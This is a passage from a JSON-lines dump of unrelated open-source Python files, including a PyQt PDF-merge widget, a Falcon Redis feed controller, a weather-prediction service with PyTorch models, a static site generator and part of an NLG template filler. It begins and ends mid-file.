fields=FIELDS):\n # i += 1\n # if i == 1000: break\n\n annotation = [x for x in annotation if x[\"id\"] is not None]\n\n labels = [x[\"label\"] for x in annotation]\n words = [x[\"form\"] for x in annotation]\n\n token_level = [{k: v for k, v in x['feats'].items() if k in token_features} for x in annotation]\n\n numerical = {}\n categorical = {}\n token_level = {}\n\n for k, v in features.items():\n if k in ['days', 'time']:\n try:\n numerical[k] = min(float(v), 100.)\n except ValueError:\n # TODO: do some smarter missing value imputation\n numerical[k] = 0.\n else:\n categorical[k] = v\n\n yield self.text_to_instance(words, labels, categorical, numerical, token_level)\n\n @overrides\n def text_to_instance(self, # type: ignore\n words: List[str],\n token_labels: List[int] = None,\n categorical: Dict[str, str] = {},\n numerical: Dict[str, float] = {},\n token_level: Dict[str, List[str]] = {}) -> Instance:\n # pylint: disable=arguments-differ\n \"\"\"\n Parameters\n ----------\n words : ``List[str]``, required.\n The words in the sentence to be encoded.\n token_labels : ``List[int]``, optional.\n The label for whether or not each token is correct.\n\n Returns\n -------\n An instance containing words and token labels.\n \"\"\"\n fields: Dict[str, Field] = {}\n\n token_indexers = {\"tokens\": self._token_indexers[\"tokens\"]}\n\n if 'token_characters' in self._token_indexers:\n token_indexers['token_characters'] = self._token_indexers[\"token_characters\"]\n\n tokens = TextField([Token(w) for w in words], token_indexers)\n fields[\"words\"] = tokens\n\n for feature, value in categorical.items():\n if feature not in self._token_indexers.keys(): continue\n fields[feature] = TextField([Token(value)], { feature: self._token_indexers[feature] })\n\n for feature, value in numerical.items():\n fields[feature] = ArrayField(np.array([value]))\n\n #token_level_features = []\n #for token_features in token_level:\n # fields[]\n\n if token_labels is not None:\n fields[\"labels\"] = SequenceLabelField(token_labels, tokens,\n label_namespace=\"token_labels\")\n\n fields[\"metadata\"] = MetadataField({\"words\": words})\n return Instance(fields)\n","repo_name":"jbarrow/reteach","sub_path":"reteach/readers/slam_reader.py","file_name":"slam_reader.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38432969698","text":"import logging\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (\n QAbstractItemView,\n QFileDialog,\n QListWidget,\n QListWidgetItem,\n QMessageBox,\n)\n\nfrom merge_pdfs.backend.app_data import APP_DATA\nfrom merge_pdfs.backend.pdf_writer import PDFWriter\n\nlogger = logging.getLogger(__name__)\n\n\nclass PDFListWidget(QListWidget):\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n\n self.setObjectName(\"listViewWidget\")\n self.setDragEnabled(True)\n self.setAcceptDrops(True)\n self.setDragDropOverwriteMode(False)\n self.setDragDropMode(QAbstractItemView.InternalMove)\n self.setAlternatingRowColors(True)\n self.setSelectionMode(QAbstractItemView.ExtendedSelection)\n\n # dict that maps item label with its paths\n self._addedFiles: Dict[str, Path] = {}\n\n def dragEnterEvent(self, e: QtGui.QDragEnterEvent) -> None:\n if e.mimeData().hasUrls:\n e.accept()\n else:\n e.ignore()\n\n def dropEvent(self, event: QtGui.QDropEvent) -> None:\n # check drop action\n dropAction = event.dropAction()\n\n # if action is MoveAction use parent behavior\n # it basically means we want to change order of existing items\n if dropAction == Qt.MoveAction:\n super().dropEvent(event)\n\n # if action is CopyAction we are dropping local files to QListWidget\n elif dropAction == Qt.CopyAction:\n mimeData = event.mimeData()\n if mimeData.hasUrls:\n event.accept()\n\n for url in mimeData.urls():\n if url.isLocalFile():\n self._addItem(url.toLocalFile())\n\n else:\n event.ignore()\n\n # otherwise ignore action\n else:\n event.ignore()\n\n def _removeItem(self, item: QListWidgetItem):\n itemText = item.text()\n logger.debug(\"Removing '%s' from the list\", itemText)\n # not really needed, because we took it from the QWidgetList,\n # but who cares (we want to be safe as almighty Java people)\n if itemText in self._addedFiles:\n del self._addedFiles[itemText]\n self.takeItem(self.row(item))\n\n def removeSelectedItems(self):\n selectedItems = self.selectedItems()\n logger.debug(\"Files to be removed from the list: %d\", len(selectedItems))\n for item in selectedItems:\n self._removeItem(item)\n\n # TODO it should present a pop up asking if user is sure\n def removeAllItems(self):\n allItems = self.count()\n logger.debug(\"All files to be removed from the list: %d\", allItems)\n\n # remove all items\n while self.count():\n item = self.takeItem(0)\n self._removeItem(item)\n\n # reset _addedFiles dict\n self._addedFiles = {}\n\n def _addItem(self, item: str):\n itemPath = Path(item)\n itemText = itemPath.name\n\n if itemText not in self._addedFiles:\n logger.debug(\"Adding '%s' to the list\", itemText)\n self._addedFiles[itemText] = itemPath\n self.addItem(itemText)\n else:\n logger.warning(\"Ignoring '%s', already on the list\", itemText)\n\n def addItemsFromDialog(self):\n openDir = str(APP_DATA.getLastDir())\n\n selectedFiles, _ = QFileDialog.getOpenFileNames(\n self,\n \"Add file(s)\",\n openDir,\n \"PDF Files (*.pdf);;Images (*.png *.jpg *.jpeg)\",\n options=QFileDialog.DontUseNativeDialog,\n )\n\n if selectedFiles:\n # save lastOpenedDir in settings file\n APP_DATA.save_setting(\"lastDir\", str(Path(selectedFiles[0]).parent))\n\n for _file in selectedFiles:\n self._addItem(_file)\n\n def saveFile(self):\n # ignore if no files were added\n if not self._addedFiles:\n logger.debug(\"Ignoring save action due to empty list\")\n return\n\n openDir = str(APP_DATA.getLastDir())\n newFile, _ = QFileDialog.getSaveFileName(\n self,\n \"Save file\",\n openDir,\n \"PDF files (*.pdf)\",\n options=QFileDialog.DontUseNativeDialog,\n )\n\n # skip if file name was not specified or cancel button was pressed\n if not newFile:\n return\n\n # make sure files will be saved in correct order\n # save as they appear in the UI\n orderedKeys = [self.item(item).text() for item in range(self.count())]\n orteredValues = [self._addedFiles[key] for key in orderedKeys]\n\n pdfWriter = PDFWriter()\n pdfWriter.merge_files(*orteredValues)\n pdfWriter.save(newFile)\n\n QMessageBox.information(\n self, \"MergePDFs\", f\"File {newFile} was successfully saved\", QMessageBox.Ok\n )\n","repo_name":"lukaszKielar/merge-pdfs","sub_path":"merge_pdfs/gui/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1501063859","text":"import argparse\nfrom os import path\nimport time\nimport random\n\nimport pandas as pd\n\nfrom scripts.utils import print_progress_bar\nfrom wikisearch.consts.mongo import CSV_SEPARATOR\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--test\", help=\"Path to testing file\")\n parser.add_argument(\"-max\", \"--max_distance\", default=14, help=\"The maximum distance exist in the dataset\")\n parser.add_argument(\"-a\", \"--amount_per_distance\", default=10, help=\"amount of couples per distance\")\n\n args = parser.parse_args()\n\n test_dataset = pd.read_csv(args.test, sep=CSV_SEPARATOR).values\n dataset_len = len(test_dataset)\n\n # Dictionary where the distances are the keys and the value is a list of couples where the keyed\n # distance is the distance between them\n max_distance = args.max_distance\n distances_couples = {idx: [] for idx in range(1, max_distance + 1)}\n\n start = time.time()\n for idx, (source, destination, distance) in enumerate(test_dataset, 1):\n distances_couples[distance].append((source, destination, distance))\n print_progress_bar(\n idx, dataset_len, time.time() - start, prefix=f'Collecting distances\\' couples', length=50)\n\n rnd_generator = random.Random()\n randomed_couples_per_distance = []\n couples_amount_per_distance = args.amount_per_distance\n for idx in range(1, max_distance + 1):\n couples_amount_per_distance = args.amount_per_distance\n if len(distances_couples[idx]) < couples_amount_per_distance:\n couples_amount_per_distance = len(distances_couples[idx])\n randomed_couples_per_distance.extend(\n rnd_generator.sample(distances_couples[idx], couples_amount_per_distance))\n\n randomed_couples_per_distance_df = pd.DataFrame.from_records(randomed_couples_per_distance,\n columns=['source', 'destination', 'min_distance'])\n\n randomed_couples_per_distance_df.to_csv(\n path.join(path.dirname(args.test), path.splitext(path.basename(args.test))[0] + \"_astar.csv\"),\n header=True, index=False, sep='\\t')\n","repo_name":"itaiperi/wikisearch","sub_path":"scripts/create_test_astar.py","file_name":"create_test_astar.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"830377081","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nimport time\nimport falcon\nimport logging\nfrom uggipuggi.constants import USER_FEED, MAX_USER_FEED_LOAD, PUBLIC_RECIPES\nfrom uggipuggi.libs.error import HTTPBadRequest\nfrom uggipuggi.helpers.logs_metrics import init_logger, init_statsd\nfrom uggipuggi.controllers.hooks import serialize, supply_redis_conn\n\n\nlogger = init_logger()\nstatsd = init_statsd('up.controllers.user_feed')\n\n@falcon.before(supply_redis_conn)\n@falcon.after(serialize)\nclass Item(object):\n def __init__(self):\n self.kafka_topic_name = 'user_feed_item'\n\n #@falcon.after(group_kafka_item_get_producer)\n @statsd.timer('get_user_feed_get')\n def on_get(self, req, resp):\n statsd.incr('user_feed.invocations')\n req.kafka_topic_name = '_'.join([self.kafka_topic_name, req.method.lower()])\n user_feed_id = USER_FEED + req.user_id\n logger.debug(\"Getting user feed: %s\" %req.user_id)\n try:\n start = req.params['query'].get('start', 0)\n limit = req.params['query'].get('limit', MAX_USER_FEED_LOAD)\n end = start + limit\n except KeyError:\n start = 0\n limit = MAX_USER_FEED_LOAD\n end = start + limit\n # For the time being get all the feed\n user_feed_item_ids = req.redis_conn.zrevrange(user_feed_id, start, end)\n logger.debug(\"Length of feed: %d\" %len(user_feed_item_ids))\n if len(user_feed_item_ids) < MAX_USER_FEED_LOAD: \n num_public_feed_len = MAX_USER_FEED_LOAD - len(user_feed_item_ids)\n logger.debug(\"Getting feed from PUBLIC recipes: %d\" %num_public_feed_len)\n \n pipeline = req.redis_conn.pipeline(True)\n for feed_id in user_feed_item_ids:\n pipeline.hgetall(feed_id)\n \n start = 0 \n public_recipe_item_ids = req.redis_conn.zrevrange(PUBLIC_RECIPES, start, num_public_feed_len)\n for feed_id in public_recipe_item_ids:\n pipeline.hgetall(feed_id)\n \n # Only here we supply the key as well because in feed we have both recipes and activities\n # and key starting with \"r:\" and activity starts with \"act:\"\n #resp.body = [{k: v} for k, v in zip(user_feed_item_ids, pipeline.execute())]\n resp.body = pipeline.execute()\n #resp.body = [dict(i, images=eval(i['images'])) for i in resp.body]\n # Redis DB stores list as string, so convert back the string to list\n for i in range(len(resp.body)):\n resp.body[i]['images'] = eval(resp.body[i]['images'])\n \n resp.status = falcon.HTTP_OK","repo_name":"krishnadubba/up_be_falcon","sub_path":"uggipuggi/controllers/user_feed.py","file_name":"user_feed.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28595311515","text":"from datetime import datetime, timedelta\n\nimport numpy as np\nimport pandas as pd\nimport requests\nimport torch\nfrom fastapi.logger import logger\n\nimport config\nimport crud\nimport utils as helper\nfrom config import SessionLocal\nfrom schemas import WeatherInfoSchema\n\n# loading data just once\ndevice = torch.device('cpu')\ndata_mean, data_std = np.load('data/stat.npy')\nmlp_model = torch.jit.load('ml_models/mlp_jit_L1.pt', map_location=device)\nmlp_model.eval()\ngru_model = torch.jit.load('ml_models/gru_jit_128_4_L1_final.pt', map_location=device)\ngru_model.eval()\nenvs = config.Settings()\n\n\n# we will not stream data to frontend. Instead we will insert data to database\n# def stream_weather_data():\n# data = weather_forcasting()\n# if data is None:\n# return\n# stream_data = json.dumps(\n# {\n# \"actual_temperature\": data[\"actual_temperature\"],\n# \"baseline_temperature\": data[\"baseline_temperature\"],\n# \"mlp_temperature\": data[\"mlp_temperature\"],\n# \"gru_temperature\": data[\"gru_temperature\"],\n# \"weather_date\": data[\"weather_date\"]\n# })\n# yield f\"data:{stream_data}\\n\\n\"\n\n\n# TODO insert data to database\ndef weather_forcasting():\n db = SessionLocal()\n date = datetime.utcnow() + timedelta(hours=1)\n current_weather_date = datetime(date.year, date.month, date.day, date.hour)\n weather_date_one_hour_ahead = current_weather_date + timedelta(hours=1)\n try:\n act_temperature = get_openweather_data(db, weather_date=current_weather_date)\n window_weather_info = get_window_weather_data(db)\n weather_features = helper.process_weather_data(window_weather_info)\n baseline_prediction = baseline_temperature_prediction(weather_features)\n norm_weather_features = np.array((weather_features - data_mean) / data_std)\n mlp_prediction = mlp_temperature_prediction(norm_weather_features)\n gru_prediction = gru_temperature_prediction(norm_weather_features)\n logger.info(\n f\"Creating new row with predictions: \"\n f\"{baseline_prediction}, {mlp_prediction}, {gru_prediction} for date: {weather_date_one_hour_ahead}.\")\n add_temperature_prediction(db, weather_date_one_hour_ahead, baseline_prediction, mlp_prediction,\n gru_prediction)\n logger.info(\"New record with predictions was created.\")\n db.close()\n return {\n \"actual_temperature\": act_temperature,\n \"baseline_temperature\": baseline_prediction,\n \"mlp_temperature\": mlp_prediction,\n \"gru_temperature\": gru_prediction,\n }\n except Exception as e:\n print(e)\n\n\ndef get_openweather_data(db_session: SessionLocal, weather_date: datetime):\n try:\n url = f\"https://api.openweathermap.org/data/2.5/weather?\" \\\n f\"lat=48.171704276327475&lon=17.211020714029374&units=metric&appid={envs.OPEN_WEATHER_API_KEY}\"\n payload = {}\n headers = {}\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n weather_info = WeatherInfoSchema()\n weather_info.weather_date = weather_date\n weather_info.actual_temperature = response.json()[\"main\"][\"temp\"]\n weather_info.humidity = response.json()[\"main\"][\"humidity\"]\n # convert form hPa to mmHg\n weather_info.pressure = response.json()[\"main\"][\"pressure\"] * 0.75006156130264\n weather_info.wind_speed = response.json()[\"wind\"][\"speed\"]\n logger.info(\"Updating current weather info: \", weather_info.weather_date, \" with values: humidity: \",\n weather_info.humidity, \" pressure: \", weather_info.pressure, \" wind speed: \",\n weather_info.wind_speed,\n \" actual temperature: \", weather_info.actual_temperature)\n update_current_weather_info(db_session, weather_info=weather_info)\n logger.info(\"Successfully current weather info.\")\n return weather_info.actual_temperature\n except Exception as e:\n logger.exception(e)\n\n\ndef insert_actual_temperature(db_session: SessionLocal, weather_info: WeatherInfoSchema):\n try:\n crud.create_weather_info(db_session, info=weather_info)\n except Exception as e:\n logger.exception(e)\n\n\ndef update_current_weather_info(db_session: SessionLocal, weather_info: WeatherInfoSchema):\n try:\n crud.update_current_weather_info(db_session, weather_info=weather_info)\n except Exception as e:\n logger.exception(e)\n\n\ndef get_window_weather_data(db_session: SessionLocal):\n try:\n return crud.get_info_for_last_window_hours(db_session, window_hours=6)\n except Exception as e:\n logger.exception(e)\n\n\ndef baseline_temperature_prediction(weather_info: pd.DataFrame):\n baseline_prediction = weather_info[\"actual_temperature\"].mean() + 1\n return baseline_prediction\n\n\ndef mlp_temperature_prediction(weather_features: np.array):\n features = np.reshape(weather_features, (1, 6, 8))\n features = torch.from_numpy(features).float().to(device)\n prediction = mlp_model(features)\n return float(prediction.detach().numpy()[0][0][0])\n\n\ndef gru_temperature_prediction(weather_features: np.array):\n features = np.reshape(weather_features, (1, 6, 8))\n features = torch.from_numpy(features).float().to(device)\n h0 = torch.zeros(2, 6, 128).to(device)\n prediction = gru_model(features, h0)\n return float(prediction.detach().numpy()[0][0])\n\n\ndef add_temperature_prediction(db_session: SessionLocal, weather_date, baseline, mlp, gru):\n try:\n crud.add_predicted_temperature(db_session, weather_date, baseline, mlp, gru)\n except Exception as e:\n logger.exception(e)\n","repo_name":"macodroid/fastapi-weather-prophet","sub_path":"forcast.py","file_name":"forcast.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7025815605","text":"import os\nimport markdown\nfrom jinja2 import Environment, FileSystemLoader\n\n# Define the directories for the site content and templates\nPAGE_DIR = 'pages'\nTEMPLATE_DIR = 'templates'\n\n# Define the file names for the site pages\nHOME_PAGE = 'index.html'\nABOUT_PAGE = 'about.html'\nERROR_PAGE = '404.html'\n\n# Load the Jinja2 templates\nenv = Environment(loader=FileSystemLoader(TEMPLATE_DIR))\nhomepage_template = env.get_template('homepage.html')\narticle_template = env.get_template('article.html')\npage_template = env.get_template('page.html')\n\n# Initialize the list of articles\narticles = []\n\n# Loop through the Markdown files in the pages directory\nfor filename in os.listdir(PAGE_DIR):\n if filename.endswith('.md'):\n # Read the Markdown file and convert it to HTML\n with open(os.path.join(PAGE_DIR, filename)) as f:\n content = markdown.markdown(f.read())\n\n # Parse the title from the Markdown file\n title = content.split('\\n')[0][1:].strip()\n\n # Determine the URL for the page\n if filename == 'index.md':\n url = HOME_PAGE\n else:\n url = filename[:-3] + '.html'\n\n # Create a dictionary for the article and add it to the list\n article = {'title': title, 'content': content, 'url': url}\n articles.append(article)\n\n # Generate the HTML for the article\n html = article_template.render(article=article)\n\n # Write the HTML to a file\n with open(os.path.join(os.getcwd(), url), 'w') as f:\n f.write(html)\n\n# Generate the HTML for the homepage\nhomepage_html = homepage_template.render(articles=articles)\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), HOME_PAGE), 'w') as f:\n f.write(homepage_html)\n\n# Generate the HTML for the about page\nabout_html = page_template.render(title='About', content='

This is the about page.

')\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), ABOUT_PAGE), 'w') as f:\n f.write(about_html)\n\n# Generate the HTML for the 404 page\nerror_html = page_template.render(title='404 - Page Not Found', content='

The requested page was not found.

')\n\n# Write the HTML to a file\nwith open(os.path.join(os.getcwd(), ERROR_PAGE), 'w') as f:\n f.write(error_html)\n","repo_name":"jamesgathuru001/Static-Stite-Generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30373231982","text":"from tools.dialogs import person as personDialog\nimport numpy as np\n\n\n# this class prepares reports from loaded dialog\n# REPORT Description:\n# The report returns list of noun-related words in each sentence per dialog part\n# NOTE:\n# This report is not meant to be saved\nclass NounPhraseParts(object):\n\n\t# constructor\n\tdef __init__(self, reportsDir):\n\t\tself.__outputDir = reportsDir\n\t\tself._dialog = None\n\t\tself._dialog_pos = None\n\t\tself._noun_tags = ['NN', 'NNP', 'NNS']\n\n\n\t# sets dialog for this report\n\tdef SetDialog(self, newDialog):\n\t\tself._dialog = newDialog\n\n\n\t# sets POS dialog for this report\n\tdef SetDialogPos(self, newDialog):\n\t\tself._dialog_pos = newDialog\n\n\n\t# returns list with noun phrases\n\tdef ExtractNounPhrases(self):\n\t\tpeople = personDialog.Person()\n\t\t# dont do anything unless everything is properly set up\n\t\tparts = self._dialog_pos.GetDialogPos()\n\t\tif parts == None:\n\t\t\treturn None\n\n\t\tresult = []\n\t\tfor part in parts:\n\t\t\tuniqueNouns = set()\n\t\t\tif len(part['sentence']) < 2:\n\t\t\t\tcontinue\n\t\t\t[ uniqueNouns.add(w[0].lower()) for w in part['pos'] if (w[1] in self._noun_tags) and len(w[0]) > 1]\n\t\t\tresult.append(people.GetEmptyNounsPerson(part['name'], part['role'], uniqueNouns))\n\t\treturn result\n\n\n\t# saves the report to file\n\tdef SaveToFile(self):\n\t\treturn None","repo_name":"polakluk/supreme-court-analysis","sub_path":"tools/reports/nlp/nounphraseparts.py","file_name":"nounphraseparts.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1885642555","text":"from GRIDD.globals import *\nimport random\n\nfrom simplenlg.framework.NLGFactory import *\nfrom simplenlg.realiser.english.Realiser import *\nfrom simplenlg.lexicon.Lexicon import *\nfrom simplenlg.phrasespec.VPPhraseSpec import *\n\nfrom simplenlg.features.NumberAgreement import *\nfrom simplenlg.features.Feature import *\nfrom simplenlg.features.Tense import *\nfrom simplenlg.features.Person import *\n\nfrom itertools import chain\n\n\n\"\"\"\nThis class works in conjunction with the service-implementation of the InferenceEngine\nin order to find appropriate template matches for a given concept graph and properly fill in the \ntemplates for each match.\n\nExecution Sequence:\n ResponseTemplateFinder\n InferenceEngine\n ResponseTemplateFiller\n\"\"\"\n\nSPECIAL_NOT_CHECK_AWARE = {'unknown_answer_to_user_q'}\n\nclass ResponseTemplateFiller:\n \"\"\"\n Fills out a template based on the provided variable matches and concept expressions.\n \"\"\"\n\n def __init__(self):\n self.lexicon = Lexicon.getDefaultLexicon()\n self.nlgFactory = NLGFactory(self.lexicon)\n self.realiser = Realiser(self.lexicon)\n\n def __call__(self, matches, expr_dict, cg, aux_state, fallback_options):\n react_cands = []\n present_cands = []\n rpresent_cands = []\n\n previous_user_requests = [p for p in chain(list(cg.predicates('user', REQ_ARG)), list(cg.predicates('user', REQ_TRUTH)))\n if aux_state.get('turn_index', -1) in cg.features.get(p[3], {}).get(UTURN, set())\n and not cg.has(p[3], USER_AWARE)]\n answer_checks = {}\n ignore = set()\n for p in previous_user_requests:\n constraints = {t for s,t,l, in cg.metagraph.out_edges(p[2], RREF)}\n for t in constraints:\n if cg.has(predicate_id=t) and cg.type(t) == TYPE:\n ignore.update({t, cg.object(t)})\n answer_checks[p] = constraints - ignore\n\n for rule, (pre_graph, post, solutions_list) in matches.items():\n repetition_type = list(post.values())[0].repetition_type\n for match_dict, virtual_preds in solutions_list:\n # add constants to match\n const_matches = {n: n for n in pre_graph.concepts() if n not in match_dict}\n match_dict.update(const_matches)\n\n if repetition_type == '_r':\n # (1) pick unused form, if there is more than one form, else pick used form\n candidates = self._get_candidates(post, aux_state, rule)\n selection = random.choice(candidates)\n elif repetition_type == '_nr':\n # if template never used before, do (1)\n if rule not in aux_state.get('responses', {}):\n candidates = self._get_candidates(post, aux_state, rule)\n selection = random.choice(candidates)\n else:\n continue # skip to next template\n elif repetition_type == '_ur':\n # get current realization of previously used form\n # if unique from previous, do (1)\n candidates = list(post.keys())\n prev = aux_state.get('responses', {}).get(rule, None)\n if prev is None: # template never used before\n selection = random.choice(candidates)\n else: # template used before\n prev_form, prev_string = prev\n curr = self._fill_template(rule, post[prev_form], match_dict, expr_dict, cg)\n if curr != prev_string: # is a unique match\n candidates.remove(prev_form)\n else: # is not a unique match\n continue # skip to next template\n selection = random.choice(candidates)\n\n rule_info = (rule, selection)\n selection = post[selection]\n response_str = self._fill_template(rule_info, selection, match_dict, expr_dict, cg)\n if response_str is None or (repetition_type == '_nr' and response_str in aux_state.get('all_resp', set())):\n continue # skip to next template\n\n if selection.template_type == '_react':\n react_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n elif selection.template_type == '_present':\n present_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n elif selection.template_type == '_rpresent':\n rpresent_cands.append((rule_info, match_dict, response_str, selection.priority, selection.topic_anchor))\n\n rp_predicates, rp_string, rp_score, rp_anchor, rp_id = None, None, None, None, None\n if len(rpresent_cands) > 0:\n print('\\nReact + Present Options: ')\n rp_predicates, rp_string, rp_score, rp_anchor, rp_id = self.select_best_candidate(rpresent_cands, cg, answer_checks)\n\n p_predicates, p_string, p_score, p_anchor, p_id = None, None, None, None, None\n if len(present_cands) > 0:\n print('\\nPresent Options: ')\n p_predicates, p_string, p_score, p_anchor, p_id = self.select_best_candidate(present_cands, cg, answer_checks)\n\n r_predicates, r_string, r_score, r_anchor, r_id = None, None, None, None, None\n curr_turn = aux_state.get('turn_index', 0)\n if len(react_cands) > 0:\n print('React Options: ')\n r_predicates, r_string, r_score, r_anchor, r_id = self.select_best_candidate(react_cands, cg, answer_checks, check_aware=False)\n\n if rp_score is not None and (p_score is None or rp_score >= p_score):\n string = rp_string\n predicates = rp_predicates\n anchor = rp_anchor\n aux_state.setdefault('responses', {})[rp_id[0]] = (rp_id[1], rp_string)\n aux_state.setdefault('all_resp', set()).add(rp_string)\n else:\n if p_string is None:\n string, predicates, anchor = (p_string, p_predicates, p_anchor)\n else:\n string = p_string\n anchor = p_anchor\n aux_state.setdefault('responses', {})[p_id[0]] = (p_id[1], p_string)\n aux_state.setdefault('all_resp', set()).add(p_string)\n predicates = p_predicates\n if curr_turn > 0:\n s = random.choice(['Yeah .', 'Gotcha .', 'I see .', 'Okay .'])\n else:\n s = ''\n if r_string is not None:\n aux_state.setdefault('responses', {})[r_id[0]] = (r_id[1], r_string)\n aux_state.setdefault('all_resp', set()).add(r_string)\n s = r_string\n # Do not add reaction predicates to predicates list in order to avoid them being treated as spoken and getting the eturn predicate\n string = s + ' ' + string\n\n type = \"template\"\n if string is None: # PICK UNUSED FALLBACK\n # can still use reaction even with fallback\n string = ''\n candidates = list(set(fallback_options.keys()) - set(aux_state.get('fallbacks', [])))\n # candidates = ['ai', 'pet', 'sport', 'movie', 'postpandemicnlg',\n # 'art', 'reading', 'tech', 'food', 'videogame', 'travel', 'phone']\n if len(candidates) > 0:\n selected = random.choice(candidates)\n # selected = candidates[len(aux_state.get('fallbacks', []))] + '_fallback'\n if 'fallbacks' not in aux_state:\n aux_state['fallbacks'] = []\n if selected not in aux_state['fallbacks']:\n aux_state['fallbacks'].append(selected)\n predicates, template_d, _ = fallback_options[selected]\n template_obj = list(template_d.values())[0]\n string = ' '.join(template_obj.string_spec_ls)\n aux_state.setdefault('all_resp', set()).add(string)\n if r_string is not None:\n aux_state.setdefault('responses', {})[r_id[0]] = (r_id[1], r_string)\n string = r_string + ' ' + string\n type = \"fallback\"\n anchor = template_obj.topic_anchor\n else:\n string = None\n predicates = None\n anchor = None\n\n if string is not None:\n string = string.replace(\"’\", \"'\")\n\n return (string, predicates, [(anchor, '_tanchor')], type)\n\n def _get_candidates(self, post, aux_state, rule):\n candidates = list(post.keys())\n if len(candidates) > 1:\n prev = aux_state.get('responses', {}).get(rule, None)\n if prev is not None:\n previous_form, previous_str = prev\n candidates.remove(previous_form)\n return candidates\n\n def _fill_template(self, rule, post, match_dict, expr_dict, cg):\n string_spec_ls = list(post.string_spec_ls) # need to create copy so as to not mutate the postcondition in the rule\n try:\n return self.fill_string(match_dict, expr_dict, string_spec_ls, cg)\n except Exception as e:\n print('Error in NLG template filling of %s for rule %s => %s' % (string_spec_ls, rule, e))\n return None\n\n def select_best_candidate(self, responses, cg, answer_checks, check_aware=True):\n # get highest salience candidate with at least one uncovered predicate\n # prefer answers to unanswered user requests above all else\n candidates = []\n answer_candidates = []\n\n for rule_info, match_dict, string, priority, topic_anchor in responses:\n rule, selection = rule_info\n # check if template that gives answer to user request\n for req, req_concepts in answer_checks.items():\n if req_concepts.issubset(set(match_dict.values())):\n answer_candidates.append(rule)\n preds = [cg.predicate(x) for x in match_dict.values() if cg.has(predicate_id=x)\n and cg.type(x) not in {EXPR, TYPE}]\n if check_aware and rule not in SPECIAL_NOT_CHECK_AWARE:\n req_pred = [cg.predicate(x) for x in match_dict.values() if cg.has(predicate_id=x)\n and cg.type(x) in {REQ_ARG, REQ_TRUTH} and cg.subject(x) == 'emora'] # check if emora already asked question\n user_awareness = [cg.has(x[3], USER_AWARE) for x in preds]\n user_req_awareness = [cg.has(x[3], USER_AWARE) for x in req_pred]\n if not check_aware or rule in SPECIAL_NOT_CHECK_AWARE or (False in user_awareness and (not user_req_awareness or False in user_req_awareness)):\n # at least one predicate is not known by the user\n # and all request predicates are not known by user, if there are requests in response\n # todo - stress test emora not asking a question she already has answer to or has asked before\n # this should work, but we do have req_unsat predicate as backup, if needed\n concepts = list(match_dict.values())\n sals = [cg.features.get(x, {}).get(SALIENCE, 0) for x in concepts]\n sal_avg = sum(sals) / len(sals)\n # GET COHERENCE BY TOPIC ANCHOR SALIENCE\n coh = cg.features.get(topic_anchor, {}).get(SALIENCE, 0)\n final_score = SAL_WEIGHT * sal_avg + PRIORITY_WEIGHT * priority + COH_WEIGHT * coh\n candidates.append((preds, string, final_score, topic_anchor, rule_info))\n print('\\t%s (sal: %.2f, coh: %.2f, pri: %.2f)' % (string, sal_avg, coh, priority))\n print()\n if len(answer_candidates) > 0:\n with_scores = [x for x in candidates if x[4][0] in answer_candidates]\n if len(with_scores) > 0:\n return max(with_scores, key=lambda x: x[2])\n if len(candidates) > 0:\n return max(candidates, key=lambda x: x[2])\n return None, None, None, None, None\n\n # todo - add in profanity check\n def fill_string(self, match_dict, expr_dict, string_spec_ls, cg):\n # initialize realizations for variables used in string_spec_ls dependencies\n specifications = {}\n realizations = {}\n for e in string_spec_ls:\n if isinstance(e, (list,tuple)):\n for k,v in e[1].items():\n if v in match_dict:\n np, np_realized = self._process_variable_match(match_dict[v], cg, expr_dict)\n if np is not None:\n specifications[v] = np\n realizations[v] = np_realized\n with_params = [(i,e) for i,e in enumerate(string_spec_ls) if isinstance(e, (list,tuple))]\n without_params = [(i,e) for i,e in enumerate(string_spec_ls) if not isinstance(e, (list,tuple))]\n\n # Replacement of constants and parameter-less variables\n for i, e in without_params:\n if '.var' in e:\n e = e[:-4]\n string_spec_ls[i] = e\n if e not in realizations:\n match = match_dict[e]\n np, np_realized = self._process_variable_match(match, cg, expr_dict)\n if np is not None:\n specifications[e] = np\n realizations[e] = np_realized\n else:\n if e not in realizations:\n realizations[e] = e\n\n with_params_dependent = []\n with_params_independent = []\n for i, e in with_params:\n for val in e[1].values():\n if val in match_dict:\n with_params_dependent.append((i,e))\n break\n else:\n with_params_independent.append((i,e))\n\n # Replacement of independent variables\n for i, e in with_params_independent:\n surface_form, spec = e\n e_id = str(e)\n if e_id not in realizations:\n if '.var' in surface_form:\n surface_form = surface_form[:-4]\n surface_form = match_dict[surface_form]\n if \"p\" in spec or \"d\" in spec: # noun\n np = self.nlgFactory.createNounPhrase()\n if surface_form in expr_dict: # the matched concept for the variable is a named concept\n noun = self.nlgFactory.createNLGElement(expr_dict[surface_form], LexicalCategory.NOUN)\n else: # not a named 